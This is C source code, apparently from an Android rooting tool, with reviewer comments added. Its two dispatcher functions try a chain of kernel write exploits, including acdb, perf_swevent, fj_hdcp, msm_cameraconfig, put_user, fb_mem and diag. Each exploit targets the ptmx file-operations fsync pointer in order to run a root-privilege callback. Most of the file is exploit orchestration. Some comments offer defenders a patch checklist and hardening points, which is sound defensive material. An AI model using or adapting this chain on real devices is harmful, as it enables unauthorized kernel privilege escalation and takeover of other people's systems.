/*
 * Walk a fixed list of kernel write primitives, all aimed at one target
 * address, and stop at the first one that reports success.
 *
 * The target is the value returned by get_ptmx_fops_address() (defined
 * elsewhere) plus 0x38; the original code names this the ptmx fsync address.
 * NOTE(review): 0x38 is presumably the offset of the fsync member inside the
 * kernel's file-operations table on the builds this was written for. That
 * layout is kernel- and ABI-specific -- confirm before relying on it.
 *
 * Order tried: acdb, perf_swevent, fj_hdcp, diag. The diag attempt is the
 * only one that is not announced on stdout.
 *
 * Review notes for defenders: every path below converges on a write to the
 * same kernel function-pointer slot, so the chain depends on (a) that slot
 * being writable at run time and (b) its address being resolvable from user
 * space. Read-only-after-init operation tables and restricted kernel-symbol
 * exposure address the shared step; patching the individual drivers named
 * by the helpers addresses each entry point.
 *
 * Returns false when the base address cannot be resolved, true as soon as
 * one of the first three attempts succeeds, otherwise the result of
 * attempt_diag_exploit().
 */
static bool run_exploit(void)
{
    const unsigned long int fops_base = get_ptmx_fops_address();
    bool succeeded;

    /* Nothing can be targeted without the table address. */
    if (fops_base == 0) {
        return false;
    }

    const unsigned long int fsync_slot = fops_base + 0x38;

    printf("Attempt acdb exploit...\n");
    succeeded = attempt_acdb_exploit(fsync_slot, 0);

    if (!succeeded) {
        printf("\n");
        printf("Attempt perf_swevent exploit...\n");
        /*
         * NOTE(review): the (int) cast narrows a function pointer to int,
         * which only preserves the value where int and pointers have the
         * same width. The code appears to assume a 32-bit target.
         */
        succeeded = perf_swevent_run_exploit(fsync_slot,
                                             (int)&obtain_root_privilege,
                                             run_obtain_root_privilege,
                                             NULL);
    }

    if (!succeeded) {
        printf("\n");
        printf("Attempt fj_hdcp exploit...\n");
        succeeded = attempt_fj_hdcp_exploit(fsync_slot, 0);
    }

    if (!succeeded) {
        printf("\n");
        /* Last resort; its result is the function's result either way. */
        succeeded = attempt_diag_exploit(fsync_slot);
    }

    return succeeded;
}
/*
 * Generic dispatcher: try each bundled kernel write primitive against
 * `address` until one of them reports that it ran, then hand back whatever
 * the caller's callback stored in the shared callback_info_t.
 *
 * address        - kernel address passed unchanged to every helper.
 * write_value    - value passed to every helper as the value to write.
 * restore_value  - passed to the acdb, fj_hdcp, msm_cameraconfig, put_user
 *                  and fb_mem helpers only; the perf_swevent and diag calls
 *                  do not receive it.
 * callback_func  - stored in info.func for the helpers to use.
 * callback_param - stored in info.param alongside it.
 *
 * Returns info.result if any helper returns true (info.result starts as
 * false, so a helper that "succeeds" without setting it still yields
 * false); returns false when every helper fails.
 *
 * Order (the original comment calls this the "most stable order"): acdb,
 * fj_hdcp, msm_cameraconfig, put_user, fb_mem, perf_swevent, diag. The diag
 * attempt is the only one not announced on stdout.
 *
 * Review note for defenders: the helper names identify the driver or kernel
 * interface each primitive depends on, which makes this list usable as a
 * patch and exposure checklist for a given device image. The helpers
 * themselves are defined elsewhere and are not described here.
 */
bool attempt_exploit(unsigned long int address,
                     unsigned long int write_value,
                     unsigned long int restore_value,
                     exploit_callback_t callback_func,
                     void *callback_param)
{
    callback_info_t ctx;
    bool handled;

    ctx.func = callback_func;
    ctx.param = callback_param;
    ctx.result = false;

    /* Attempt exploits in most stable order */
    printf("Attempt acdb exploit...\n");
    handled = attempt_acdb_exploit(address, write_value, restore_value, &ctx);

    if (!handled) {
        printf("\n");
        printf("Attempt fj_hdcp exploit...\n");
        handled = attempt_fj_hdcp_exploit(address, write_value,
                                          restore_value, &ctx);
    }

    if (!handled) {
        printf("\n");
        printf("Attempt msm_cameraconfig exploit...\n");
        handled = attempt_msm_cameraconfig_exploit(address, write_value,
                                                   restore_value, &ctx);
    }

    if (!handled) {
        printf("\n");
        printf("Attempt put_user exploit...\n");
        handled = attempt_put_user_exploit(address, write_value,
                                           restore_value, &ctx);
    }

    if (!handled) {
        printf("\n");
        printf("Attempt fb_mem exploit...\n");
        handled = attempt_fb_mem_exploit(address, write_value,
                                         restore_value, &ctx);
    }

    if (!handled) {
        printf("\n");
        printf("Attempt perf_swevent exploit...\n");
        /* This helper takes a trampoline (run_callback) and no restore value. */
        handled = perf_swevent_run_exploit(address, write_value,
                                           &run_callback, &ctx);
    }

    if (!handled) {
        printf("\n");
        /* No banner is printed for the diag attempt in the original. */
        handled = attempt_diag_exploit(address, write_value, &ctx);
    }

    /* ctx.result is only meaningful when some helper actually ran. */
    if (handled) {
        return ctx.result;
    }
    return false;
}